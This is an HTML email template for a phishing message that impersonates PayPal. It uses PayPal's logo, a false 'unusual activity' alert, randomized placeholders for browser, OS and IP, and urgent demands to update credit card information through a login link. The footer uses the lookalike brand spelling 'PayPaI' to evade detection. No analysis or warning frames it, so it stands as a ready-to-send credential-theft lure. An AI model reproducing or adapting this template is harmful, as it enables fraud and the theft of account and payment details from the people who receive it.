<!DOCTYPE html>
<html>
<head><META NAME="ROBOTS" CONTENT="NOINDEX, NOFOLLOW">
<style>
    a {text-decoration:none;}
    a:hover {text-decoration:underline;}
    .afooter {color:#0044cc !important;}
    table td {border-collapse:collapse;margin:0;padding:0;}
</style>
</head><body>


<!--  -->
<!--  -->
<!-- -->

<table width="600" cellpadding="0" cellspacing="0" border="0" align="center">
    <tr>
        <td width="600" align="right" valign="middle" style="color:#3d3d3d; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:bold; padding:12px 0;">
            <p>
Order Confirmation | <a href="https://wwww" title="View this email in your browser"  style="color:#0044cc;">View this email in your browser</a>.
</p>
        </td>
    </tr>
</table>
<table width="600" cellpadding="0" cellspacing="0" border="0" align="center">
    <tr>
         <td width="20" valign="middle" style="color:#000000; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:bold; padding:20px 0 0;">
            &nbsp;
         </td>
         <td width="580" valign="middle" style="color:#000000; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:bold; padding:20px 0 10px;">
            <img src="https://www.paypalobjects.com/webstatic/i/logo/rebrand/ppcom.svg" width="160" height="34" alt="Customer Service" border="0">

<h1 style="color:#000; font-family:'Segoe UI Light','Segoe UI',Arial,sans-serif; font-size:38px; font-weight:100; line-height:38px; padding:0 0;"><a href="https://wwww" title="Update your credit card"  style="color:#0044cc; text-transform:uppercase;">Action Required: Update your credit card information now</h1>
         </td>
         <td width="20" valign="middle" style="color:#000000; font-family:'Segoe UI',Arial,sans-serif; font-size:12px; font-weight:bold; padding:20px 0 0;">
            &nbsp;
         </td>
    </tr>
</table>
<table width="600" cellpadding="0" cellspacing="0" border="0" align="center">
    <tr>
        <td width="20">&nbsp;</td>
        <td width="580" align="left" valign="top" style="font-family:'Segoe UI',Arial,sans-serif; font-size:13px; line-height:16px; padding:20px 0 30px;">
            <p>
<!-- START AMPSCRIPT 
-->
<br>
<br>
Unusual Activity On Your Account !<br>
<br>
Here Is Detail :
<br>
<br>
Browser  &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;         : ##random_browser##<br>
OS &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   : ##random_os##<br>
IP   &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;              : ##random_ip## (##random_country##) <br>
<br>
+ If The Information Above Looks Familiar, You Can Disregard This Email.<br>
+ If You Have Not Signed In To Yur Account Recently and Believe Someone May Have Accessed Your Account.<br>
+ Your Credit Card Is Declined, Please Update Before Your Account Will Be Limited.<br>
<br>
To Verify Your Account Please Click Link/Log In :<br>
<br>
<A 
                                href="https://wwww" 
                                target=_blank>Log In Here </A>
							
<br>
<br>
-------------------------------------------------------------------------<br>
<br></b>
This Is An Automatically Generated Email, Please Do Not Reply<br>
You Are Receiving This Email Because You Are A Registered Member Of PayPaI<br>
Read Our Privacy Policy,Security and Protection If You Have Any Questions<br>
<br>
<br>
Copyright &copy 1999-2018 PayPal All Rights Reserved.<br> 